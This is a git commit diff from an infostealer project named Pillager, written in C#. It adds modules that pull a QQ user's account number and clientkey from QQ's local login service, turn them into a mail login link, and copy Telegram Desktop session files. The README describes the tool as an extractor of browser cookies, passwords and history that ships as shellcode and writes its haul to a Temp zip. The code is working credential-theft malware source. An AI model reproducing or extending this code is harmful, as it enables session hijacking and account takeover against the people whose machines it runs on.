update qq&tg
This commit is contained in:
parent
a9aa6ea21f
commit
eb3186aeb3
|
@ -0,0 +1,147 @@
|
|||
using System;
|
||||
using System.Collections.Generic;
|
||||
using System.IO;
|
||||
using System.Linq;
|
||||
using System.Net;
|
||||
using System.Text;
|
||||
|
||||
namespace Pillager.IM
|
||||
{
|
||||
internal class QQ
|
||||
{
|
||||
public static string IMName = "QQ";
|
||||
|
||||
public static string get_pt_local_token()
|
||||
{
|
||||
try
|
||||
{
|
||||
Uri uri = new Uri(@"https://xui.ptlogin2.qq.com/cgi-bin/xlogin?proxy_url=https%3A//qzs.qq.com/qzone/v6/portal/proxy.html&daid=5&&hide_title_bar=1&low_login=0&qlogin_auto_login=1&no_verifyimg=1&link_target=blank&style=22&target=self&s_url=https%3A%2F%2Fqzs.qzone.qq.com%2Fqzone%2Fv5%2Floginsucc.html%3Fpara%3Dizone");
|
||||
|
||||
HttpWebRequest myRequest = (HttpWebRequest)WebRequest.Create(uri);
|
||||
myRequest.UserAgent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0";
|
||||
myRequest.Accept = "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8";
|
||||
myRequest.Referer = "https://i.qq.com/";
|
||||
HttpWebResponse response = (HttpWebResponse)myRequest.GetResponse();
|
||||
string temp = response.Headers.Get("Set-Cookie");
|
||||
string[] cookstr = temp.Replace(" ", "").Split(new char[] { ',', ';' });
|
||||
string pt_local_token = "";
|
||||
foreach (string str in cookstr)
|
||||
{
|
||||
string[] cookieNameValue = str.Split('=');
|
||||
if (cookieNameValue[0] == "pt_local_token")
|
||||
pt_local_token = cookieNameValue[1];
|
||||
}
|
||||
return pt_local_token;
|
||||
}
|
||||
catch
|
||||
{
|
||||
return "";
|
||||
}
|
||||
|
||||
}
|
||||
|
||||
public static string get_unis(string pt_local_token)
|
||||
{
|
||||
try
|
||||
{
|
||||
Uri uri = new Uri(@"https://localhost.ptlogin2.qq.com:4301/pt_get_uins?callback=ptui_getuins_CB&pt_local_tk=" + pt_local_token);
|
||||
HttpWebRequest myRequest = (HttpWebRequest)WebRequest.Create(uri);
|
||||
myRequest.UserAgent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0";
|
||||
myRequest.Accept = "*/*";
|
||||
myRequest.Referer = "https://xui.ptlogin2.qq.com/";
|
||||
myRequest.CookieContainer = new CookieContainer();
|
||||
myRequest.CookieContainer.Add(new Cookie("pt_local_token", pt_local_token, "/", ".qq.com"));
|
||||
myRequest.CookieContainer.Add(new Cookie("_qz_referrer", "i.qq.com", "/", ".qq.com"));
|
||||
HttpWebResponse response = (HttpWebResponse)myRequest.GetResponse();
|
||||
Stream temp = response.GetResponseStream();
|
||||
using (StreamReader sr = new StreamReader(temp))
|
||||
{
|
||||
string content = sr.ReadToEnd();
|
||||
string[] cookstr = content.Replace(" ", "").Split(new char[] { ',', ':' });
|
||||
if (cookstr.Length > 0)
|
||||
return cookstr[1];
|
||||
}
|
||||
return "";
|
||||
}
|
||||
catch
|
||||
{
|
||||
return "";
|
||||
}
|
||||
|
||||
}
|
||||
|
||||
public static string get_qkey(string pt_local_token, string uin)
|
||||
{
|
||||
try
|
||||
{
|
||||
HttpWebRequest request = (HttpWebRequest)WebRequest.Create(new Uri(@"https://localhost.ptlogin2.qq.com:4301/pt_get_st?clientuin=" + uin + "&r=0.1111111111111111&pt_local_tk=" + pt_local_token + "&callback=__jp0"));
|
||||
request.CookieContainer = new CookieContainer();
|
||||
request.CookieContainer.Add(new Cookie("pt_local_token", pt_local_token, "/", ".qq.com"));
|
||||
request.CookieContainer.Add(new Cookie("clientuin", "uin", "/", ".qq.com"));
|
||||
request.CookieContainer.Add(new Cookie("pt2gguin", "o" + uin + "_qz_referrer=i.qq.com", "/", ".qq.com"));
|
||||
request.Referer = "https://xui.ptlogin2.qq.com/";
|
||||
request.UserAgent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0";
|
||||
request.Accept = "*/*";
|
||||
HttpWebResponse response2 = (HttpWebResponse)request.GetResponse();
|
||||
string temp = response2.Headers.Get("Set-Cookie");
|
||||
string[] cookstr = temp.Replace(" ", "").Split(new char[] { ',', ';' });
|
||||
foreach (string str in cookstr)
|
||||
{
|
||||
string[] cookieNameValue = str.Split('=');
|
||||
if (cookieNameValue[0] == "clientkey")
|
||||
return cookieNameValue[1];
|
||||
}
|
||||
return "";
|
||||
}
|
||||
catch
|
||||
{
|
||||
return "";
|
||||
}
|
||||
}
|
||||
|
||||
public static string get_link(string clientkey, string uin)
|
||||
{
|
||||
try
|
||||
{
|
||||
HttpWebRequest request = (HttpWebRequest)WebRequest.Create(new Uri("https://ptlogin2.qq.com/jump?clientuin=" + uin + "&clientkey=" + clientkey + "&keyindex=9&u1=https%3A%2F%2Fmail.qq.com%2Fcgi-bin%2Flogin%3Fvt%3Dpassport%26vm%3Dwpt%26ft%3Dloginpage%26target%3D&pt_local_tk=&pt_3rd_aid=0&ptopt=1&style=25"));
|
||||
request.UserAgent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0";
|
||||
request.Accept = "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9";
|
||||
HttpWebResponse response = (HttpWebResponse)request.GetResponse();
|
||||
Stream temp = response.GetResponseStream();
|
||||
using (StreamReader sr = new StreamReader(temp))
|
||||
{
|
||||
string content = sr.ReadToEnd();
|
||||
string[] cookstr = content.Replace(" ", "").Split(new char[] { '\'' });
|
||||
if (cookstr.Length > 0)
|
||||
return cookstr[3];
|
||||
}
|
||||
return "";
|
||||
}
|
||||
catch
|
||||
{
|
||||
return "";
|
||||
}
|
||||
|
||||
}
|
||||
|
||||
public static void Save(string path)
|
||||
{
|
||||
ServicePointManager.SecurityProtocol = (SecurityProtocolType)(768 | 3072);
|
||||
string pt_local_token = get_pt_local_token();
|
||||
if (pt_local_token == "") return;
|
||||
string uin = get_unis(pt_local_token);
|
||||
if (uin == "") return;
|
||||
string clientkey = get_qkey(pt_local_token, uin);
|
||||
if (clientkey == "") return;
|
||||
string link = get_link(clientkey, uin);
|
||||
if (link == "") return;
|
||||
|
||||
string savepath = Path.Combine(path, IMName);
|
||||
Directory.CreateDirectory(savepath);
|
||||
StringBuilder sb = new StringBuilder();
|
||||
sb.AppendLine("QQ:"+ uin);
|
||||
sb.AppendLine("Mail:"+ link);
|
||||
File.WriteAllText(Path.Combine(savepath, IMName + "_ClientKey.txt"), sb.ToString());
|
||||
}
|
||||
}
|
||||
}
|
|
@ -0,0 +1,51 @@
|
|||
using Pillager.Helper;
|
||||
using System;
|
||||
using System.Collections.Generic;
|
||||
using System.IO;
|
||||
using System.Linq;
|
||||
using System.Text;
|
||||
using System.Text.RegularExpressions;
|
||||
|
||||
namespace Pillager.IM
|
||||
{
|
||||
internal class Telegram
|
||||
{
|
||||
public static string IMName = "Telegram";
|
||||
|
||||
public static string IMPath = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), "Telegram Desktop");
|
||||
|
||||
public static void Save(string path)
|
||||
{
|
||||
if (!Directory.Exists(IMPath)) return;
|
||||
string savepath = Path.Combine(path, IMName);
|
||||
Directory.CreateDirectory(savepath);
|
||||
string[] sessionpaths =
|
||||
{
|
||||
"tdata\\key_datas",
|
||||
"tdata\\D877F783D5D3EF8Cs",
|
||||
"tdata\\D877F783D5D3EF8C\\maps",
|
||||
"tdata\\A7FDF864FBC10B77s",
|
||||
"tdata\\A7FDF864FBC10B77\\maps",
|
||||
"tdata\\F8806DD0C461824Fs",
|
||||
"tdata\\F8806DD0C461824F\\maps",
|
||||
"tdata\\C2B05980D9127787s",
|
||||
"tdata\\C2B05980D9127787\\maps",
|
||||
"tdata\\0CA814316818D8F6s",
|
||||
"tdata\\0CA814316818D8F6\\maps",
|
||||
};
|
||||
Directory.CreateDirectory(Path.Combine(savepath, "tdata"));
|
||||
Directory.CreateDirectory(savepath + "\\tdata\\D877F783D5D3EF8C");
|
||||
Directory.CreateDirectory(savepath + "\\tdata\\A7FDF864FBC10B77");
|
||||
Directory.CreateDirectory(savepath + "\\tdata\\F8806DD0C461824F");
|
||||
Directory.CreateDirectory(savepath + "\\tdata\\C2B05980D9127787");
|
||||
Directory.CreateDirectory(savepath + "\\tdata\\0CA814316818D8F6");
|
||||
foreach (var sessionpath in sessionpaths)
|
||||
{
|
||||
if (File.Exists(Path.Combine(IMPath, sessionpath)))
|
||||
{
|
||||
File.Copy(Path.Combine(IMPath, sessionpath), Path.Combine(savepath, sessionpath),true);
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
|
@ -55,6 +55,8 @@
|
|||
<Compile Include="Helper\Pbkdf2.cs" />
|
||||
<Compile Include="Helper\TripleDESHelper.cs" />
|
||||
<Compile Include="Helper\VaultCli.cs" />
|
||||
<Compile Include="IM\QQ.cs" />
|
||||
<Compile Include="IM\Telegram.cs" />
|
||||
<Compile Include="Program.cs" />
|
||||
<Compile Include="Properties\AssemblyInfo.cs" />
|
||||
<Compile Include="Helper\SQLiteHandler.cs" />
|
||||
|
|
|
@ -3,6 +3,7 @@ using System.Collections.Generic;
|
|||
using System.IO;
|
||||
using System.IO.Compression;
|
||||
using Pillager.Browsers;
|
||||
using Pillager.IM;
|
||||
|
||||
namespace Pillager
|
||||
{
|
||||
|
@ -16,6 +17,8 @@ namespace Pillager
|
|||
if (File.Exists(savezippath)) File.Delete(savezippath);
|
||||
Directory.CreateDirectory(savepath);
|
||||
|
||||
Telegram.Save(savepath);
|
||||
|
||||
//IE
|
||||
IE.Save(savepath);
|
||||
|
||||
|
|
37
README.md
37
README.md
|
@ -4,29 +4,36 @@
|
|||
|
||||
## 介绍
|
||||
|
||||
这是一个浏览器信息提取工具,将会长期维护,如果有任何问题或建议,欢迎发issues
|
||||
这是一个敏感信息提取工具,将会长期维护,如果有任何问题或建议,欢迎发issues
|
||||
|
||||
在整理工具的过程中,发现目前的浏览器信息提取工具,普遍存在各种问题,最常见的如体积过大,缺少维护,Chrome提取都有可能存在问题,于是自己在现有工具的基础上进行整理,得到了这款工具
|
||||
在整理工具的过程中,发现目前的信息提取工具,普遍存在各种问题,最常见的如体积过大,缺少维护,于是自己在现有工具的基础上进行整理,得到了这款工具
|
||||
|
||||
目前支持:
|
||||
|
||||
* IE
|
||||
* Edge
|
||||
* Chrome
|
||||
* Chrome Beta
|
||||
* Chromium
|
||||
* Brave-Browser
|
||||
* QQBrowser
|
||||
* SogouExplorer
|
||||
* Vivaldi
|
||||
* CocCoc
|
||||
* FireFox
|
||||
| Browser | BookMarks | Cookies | Passwords | Historys |
|
||||
| :------------ | :-------: | :-----: | :-------: | :------: |
|
||||
| IE | ✅ | ❌ | ✅ | ✅ |
|
||||
| Edge | ✅ | ✅ | ✅ | ✅ |
|
||||
| Chrome | ✅ | ✅ | ✅ | ✅ |
|
||||
| Chrome Beta | ✅ | ✅ | ✅ | ✅ |
|
||||
| Chromium | ✅ | ✅ | ✅ | ✅ |
|
||||
| Brave-Browser | ✅ | ✅ | ✅ | ✅ |
|
||||
| QQBrowser | ✅ | ✅ | ✅ | ✅ |
|
||||
| SogouExplorer | ✅ | ✅ | ✅ | ✅ |
|
||||
| Vivaldi | ✅ | ✅ | ✅ | ✅ |
|
||||
| CocCoc | ✅ | ✅ | ✅ | ✅ |
|
||||
| FireFox | ✅ | ✅ | ✅ | ✅ |
|
||||
|
||||
后续将会陆续添加支持的浏览器
|
||||
| IM | Support |
|
||||
| -------- | ------------------ |
|
||||
| QQ | ClientKey(Email) |
|
||||
| Telegram | tdata |
|
||||
|
||||
后续将会陆续添加支持的软件
|
||||
|
||||
## 优点
|
||||
|
||||
体积小,长期维护,shellcode兼容.Net Framework 2.x/3.x/4.x , shellcode兼容x86/x64,执行后文件输出至`%Temp%\Pillager.zip`
|
||||
体积小,长期维护,shellcode兼容.Net Framework 2.x/3.x/4.x , shellcode兼容x86/x64,执行后文件输出至 `%Temp%\Pillager.zip`
|
||||
|
||||
## 编译
|
||||
|
||||
|
|
Loading…
Reference in New Issue